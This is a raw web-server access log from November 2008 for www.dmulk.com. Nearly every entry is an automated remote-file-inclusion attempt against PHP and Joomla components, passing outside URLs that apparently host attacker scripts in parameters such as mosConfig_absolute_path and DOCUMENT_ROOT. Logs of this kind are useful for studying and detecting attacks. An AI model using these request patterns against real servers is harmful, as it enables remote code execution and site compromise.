66.90.73.177 - - [04/Nov/2008:08:12:11 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://billing.webcity.co.uk/~date/cc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.90.73.177 - - [04/Nov/2008:08:12:11 -0800] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://billing.webcity.co.uk/~date/cc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.90.73.177 - - [04/Nov/2008:08:12:11 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://billing.webcity.co.uk/~date/cc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
196.12.157.26 - - [04/Nov/2008:08:13:09 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.documenta.eti.br/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
196.12.157.26 - - [04/Nov/2008:08:13:09 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.documenta.eti.br/id.txt? HTTP/1.1" 200 94665 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
196.12.157.26 - - [04/Nov/2008:08:13:11 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.documenta.eti.br/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:15:31 -0800] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:15:32 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 200 94730 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:15:38 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
196.12.157.26 - - [04/Nov/2008:08:15:52 -0800] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.documenta.eti.br/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
196.12.157.26 - - [04/Nov/2008:08:15:53 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.documenta.eti.br/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
196.12.157.26 - - [04/Nov/2008:08:15:57 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.documenta.eti.br/id.txt? HTTP/1.1" 200 94665 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:16:15 -0800] "GET /logs/access_080906.log/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:16:16 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:16:16 -0800] "GET /logs/access_080831.log/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.239.210.245 - - [04/Nov/2008:08:16:20 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://vobucks.com/spam/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
66.239.210.245 - - [04/Nov/2008:08:16:20 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://vobucks.com/spam/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
70.38.12.204 - - [04/Nov/2008:08:16:23 -0800] "GET /logs/access_080906.log/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [04/Nov/2008:08:16:23 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [04/Nov/2008:08:16:24 -0800] "GET /logs/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.38.231 - - [04/Nov/2008:08:16:26 -0800] "GET /logs/access_080906.log/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.38.231 - - [04/Nov/2008:08:16:26 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:08:16:26 -0800] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:08:16:26 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.38.231 - - [04/Nov/2008:08:16:27 -0800] "GET /logs/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
222.236.44.26 - - [04/Nov/2008:08:16:28 -0800] "GET /logs/access_080207.log//?phpbb_root_path=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.38.12.204 - - [04/Nov/2008:08:16:29 -0800] "GET /logs/access_080831.log/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.246.154.68 - - [04/Nov/2008:08:16:31 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.246.154.68 - - [04/Nov/2008:08:16:31 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.246.154.68 - - [04/Nov/2008:08:16:32 -0800] "GET /logs/access_080908.log%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.38.38.231 - - [04/Nov/2008:08:16:39 -0800] "GET /logs/access_080831.log/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
196.12.157.26 - - [04/Nov/2008:08:16:40 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.documenta.eti.br/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
63.246.30.14 - - [04/Nov/2008:08:16:40 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.246.30.14 - - [04/Nov/2008:08:16:40 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.246.30.14 - - [04/Nov/2008:08:16:40 -0800] "GET /logs/access_080908.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:16:53 -0800] "GET /logs/access_080906.log/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:16:53 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:16:53 -0800] "GET /logs/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:16:54 -0800] "GET /logs/access_080906.log/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:16:54 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:16:54 -0800] "GET /logs/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:17:03 -0800] "GET /logs/access_080831.log/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:17:03 -0800] "GET /logs/access_080831.log/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.252 - - [04/Nov/2008:08:17:10 -0800] "GET /bikes/dteel/2008_01_27/Medium/ HTTP/1.0" 200 4809 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:08:17:14 -0800] "GET /administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:08:17:15 -0800] "GET /administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:08:17:16 -0800] "GET /administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
117.110.136.131 - - [04/Nov/2008:08:17:22 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
117.110.136.131 - - [04/Nov/2008:08:17:22 -0800] "GET /logs/access_080908.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
117.110.136.131 - - [04/Nov/2008:08:17:22 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.38.38.231 - - [04/Nov/2008:08:17:58 -0800] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.38.231 - - [04/Nov/2008:08:17:59 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 200 94730 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.38.231 - - [04/Nov/2008:08:18:00 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.12.204 - - [04/Nov/2008:08:18:02 -0800] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.3.194.35 - - [04/Nov/2008:08:18:03 -0800] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.imperaportal.info/amt/pepekid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.3.194.35 - - [04/Nov/2008:08:18:04 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.imperaportal.info/amt/pepekid.txt?? HTTP/1.1" 200 94786 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [04/Nov/2008:08:18:04 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 200 94730 "-" "libwww-perl/5.805" "www.dmulk.com"
195.3.194.35 - - [04/Nov/2008:08:18:04 -0800] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://bugisku.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.3.194.35 - - [04/Nov/2008:08:18:04 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://bugisku.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.3.194.35 - - [04/Nov/2008:08:18:04 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.imperaportal.info/amt/pepekid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.12.204 - - [04/Nov/2008:08:18:04 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.3.194.35 - - [04/Nov/2008:08:18:05 -0800] "GET /index.php?DOCUMENT_ROOT=http://bugisku.com/chid.txt?? HTTP/1.1" 200 94653 "-" "libwww-perl/5.805" "www.dmulk.com"
195.3.194.35 - - [04/Nov/2008:08:18:10 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.imperaportal.info/amt/pepekid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.3.194.35 - - [04/Nov/2008:08:18:10 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://bugisku.com/chid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.38.231 - - [04/Nov/2008:08:18:28 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
63.246.30.14 - - [04/Nov/2008:08:18:29 -0800] "GET /logs/access_080908.log%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.38.12.204 - - [04/Nov/2008:08:18:38 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:18:44 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.13.217.217 - - [04/Nov/2008:08:18:49 -0800] "GET /logs/errors.php?error=http://www.geocities.com/scannersspreads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.13.217.217 - - [04/Nov/2008:08:18:50 -0800] "GET /errors.php?error=http://www.geocities.com/scannersspreads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:08:18:54 -0800] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:08:18:54 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:08:18:54 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:08:18:54 -0800] "GET /logs/access_080430.log//newspublish/include.php?path%5Bdocroot%5D=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.13.48.145 - - [04/Nov/2008:08:19:02 -0800] "GET /logs/access_080330.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.lucrei.com.br/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
78.13.48.145 - - [04/Nov/2008:08:19:28 -0800] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.lucrei.com.br/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:08:19:31 -0800] "GET /logs/access_080906.log/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:08:19:31 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:08:19:31 -0800] "GET /logs/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
78.129.138.184 - - [04/Nov/2008:08:19:35 -0800] "GET /logs/access_080925.log//index.php?option=com_forum&Itemid=1&mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.221.91.28 - - [04/Nov/2008:08:19:38 -0800] "GET /logs/access_080831.log/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:08:20:24 -0800] "GET /kboard.php?board=free&act=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:08:20:24 -0800] "GET /logs/access_081018.log//kboard.php?board=free&act=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:08:20:27 -0800] "GET /logs//kboard.php?board=free&act=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:20:29 -0800] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:20:29 -0800] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:20:29 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 200 94730 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:20:30 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 200 94714 "-" "libwww-perl/5.805" "www.dmulk.com"
117.110.136.131 - - [04/Nov/2008:08:20:30 -0800] "GET /logs/access_080908.log%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://dcarguy.com/subscription/amember.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:20:30 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:20:30 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:08:20:39 -0800] "GET /logs/access_080820.log/browse.php/header.php?prefix=http://www.pass100.co.kr/LykBoard/image.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.28.139.42 - - [04/Nov/2008:08:20:46 -0800] "GET /logs/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.28.139.42 - - [04/Nov/2008:08:20:46 -0800] "GET /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.28.139.42 - - [04/Nov/2008:08:20:47 -0800] "GET /logs/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.174.68.56 - - [04/Nov/2008:08:20:52 -0800] "GET /logs/access_080925.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.174.68.56 - - [04/Nov/2008:08:20:53 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.174.68.56 - - [04/Nov/2008:08:20:53 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://198.65.56.163/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:08:21:03 -0800] "GET /logs/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:08:21:03 -0800] "GET /administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:21:07 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [04/Nov/2008:08:21:10 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.239.210.245 - - [04/Nov/2008:08:21:17 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://vobucks.com/spam/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
66.239.210.245 - - [04/Nov/2008:08:21:17 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://vobucks.com/spam/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:08:21:19 -0800] "GET /logs/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:08:21:19 -0800] "GET /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:21:24 -0800] "GET /logs/access_080906.log/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:21:24 -0800] "GET /components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [04/Nov/2008:08:21:24 -0800] "GET /logs/components/com_flyspray/startdown.php?file=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:08:21:29 -0800] "GET /logs/access_080904.log//phpSecurePages/secure.php?&cfgProgDir=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:08:21:30 -0800] "GET /phpSecurePages/secure.php?&cfgProgDir=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.150.159.206 - - [04/Nov/2008:08:21:30 -0800] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://botok.xtgem.com/id/idp8.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.246.52.41 - - [04/Nov/2008:08:21:34 -0800] "GET /logs/access_080310.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://vobucks.com/spam/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.52.41 - - [04/Nov/2008:08:21:34 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://vobucks.com/spam/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:08:21:35 -0800] "GET /logs/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:08:21:35 -0800] "GET /administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
